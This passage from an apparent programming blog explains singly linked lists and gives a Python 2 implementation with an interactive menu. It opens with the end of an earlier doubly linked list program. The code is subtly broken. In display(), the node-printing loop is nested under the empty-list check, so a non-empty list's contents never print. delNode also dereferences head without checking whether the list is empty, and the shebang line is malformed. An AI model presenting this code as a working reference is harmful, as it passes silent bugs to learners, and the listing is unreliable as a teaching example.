    print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n"


if __name__ == "__main__":
    ''' Main function '''

    list = List()
    while True:
        print "+-+-+-+-+-+-+-+-+-Doubly Linked list+-+-+-+-+-+-+-+-+-+"
        print "+ 1. Add a node to the tail                           +"
        print "+ 2. Add a node to the head                           +"
        print "+ 3. Remove a node from tail                          +"
        print "+ 4. Remove a node from head                          +"
        print "+ 5. Remove a node                                    +"
        print "+ 6. Exit                                             +"
        print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+"
        s = int(raw_input('Enter your Choice: '))
        if s==1:
            inp = int(raw_input('Enter the element you want to insert to the tail: '))
            list.addNodeTail(inp)
            display(list)

        elif s==2:
            inp = int(raw_input('Enter the element you want to insert to the head: '))
            list.addNodeHead(inp)
            display(list)

        elif s==3:   
            list.delNodeTail()
            display(list)
            
        elif s==4:
            list.delNodeHead()
            display(list)

        elif s==5:
            inp = int(raw_input('Enter the element you want to delete from the list: '))
            list.delNode(inp)
            display(list)

        elif s==6:
            break;

        else:
            print "Invalid input"

Singly linked list


A linked list is a group of nodes which together represents a sequence. In this blog, I am trying to explain about singly linked list.

Singly linked lists contain nodes which have a data field as well as a next field, which points to the next node in the linked list.

Example

1 -> 5 -> 2 -> 9 -> None

Code

# /usr/bin/python
# An implementation of linked list

class ListNode:
    def __init__(self, data):
        self.data = data
        self.next = None

class List:
    def __init__(self):
        self.head = self.tail = None

    def addFirstNode(self, newNode):
        ''' A function to add the first node to the list'''

        self.head = self.tail = newNode

    def addNodeTail(self,  data):
        ''' Function to add an element to the tail of the list '''

        newNode = ListNode(data)

        # Empty list
        if self.head == None:
            self.addFirstNode(newNode)
    
        # Non-empty list
        else:
            self.tail.next = newNode
            self.tail = newNode

        self.tail.next = None

    def addNodeHead(self, data): 
        '''Function to add an element to the head of the list '''

        newNode = ListNode(data)
        
        # Empty list
        if self.head == None:
            self.addFirstNode(newNode)
        
        # Non-empty list
        else:
            temp = self.head
            self.head = newNode
            self.head.next = temp
    

    def delFirstNode(self):
        ''' Function to delete the single node '''

        self.head = self.tail = None

    def delNodeTail(self):
        ''' Function to delete an element from the list '''

        node = self.head

        # Empty list
        if self.head == None:
            print "List is empty"
            return 

        # Single node list
        elif self.head == self.tail:
            self.delFirstNode()
            return 

        # Multiple node list
        else:
            while node.next.next != None:
                node = node.next
            node.next = None
            self.tail = node

    def delNodeHead(self):
        ''' Function to delete a node from head '''

        node = self.head

        # Empty list
        if self.head == None:
            print "List is empty"
            return

        # Single node list
        if self.head == self.tail:
            self.delFirstNode()
            return    
        
        # Multi-node list
        if self.head != self.tail:
            node = node.next
            self.head = node
            return


    def delNode(self, element):
        ''' Function to delete a user specified given node '''

        node = self.head
        found = False
    
        # If there's only one node and it doesn't contain the given element
        if self.head == self.tail and self.head.data != element:
            print "Element not found in the list"
            return
        
        # If the head node contains the element
        if self.head.data == element:
            self.delNodeHead()
            return
        
        # To check if the node is in the rest of the list
        while node.next != None:
            if node.next.data == element:
                found = True
                break
      
            else:
                node = node.next

        # If node was found
        if found:
            if node.next.next != None:
                node.next = node.next.next

            else:
                self.delNodeTail()

        # If the element was not found in the list
        else:
            print "Element not found in the list"
      
def display(list):
    ''' Function to display the linked list '''

    print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+"
    node = list.head
    if list.head == None:
        print "List is empty! Fill something in the list in-order to delete"
        print "Head -> None  ",
        while node is not None:
            print " %d " % (node.data),
            node = node.next 
            if node is not None:
                print "->",
        print " <- Tail",
    print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n"


if __name__ == "__main__":
    ''' Main function '''

    list = List()
    while True:
        print "+-+-+-+-+-+-+-+-+-Singly Linked list+-+-+-+-+-+-+-+-+-+"
        print "+ 1. Add a node to the tail                           +"
        print "+ 2. Add a node to the head                           +"
        print "+ 3. Remove a node from tail                          +"
        print "+ 4. Remove a node from head                          +"
        print "+ 5. Remove a node                                    +"
        print "+ 6. Exit                                             +"
        print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+"
        s = int(raw_input('Enter your Choice: '))
        if s == 1:
            inp = int(raw_input('Enter the element you want to insert to the tail: '))
            list.addNodeTail(inp)
            display(list)

        elif s==2:
            inp = int(raw_input('Enter the element you want to insert to the head: '))
            list.addNodeHead(inp)
            display(list)

        elif s==3:   
            list.delNodeTail()
            display(list)
            
        elif s==4:
            list.delNodeHead()
            display(list)

        elif s==5:
            inp = int(raw_input('Enter the element you want to delete from the list: '))
            list.delNode(inp)
            display(list)

        elif s==6:
            break;

        else:
            print "Invalid input"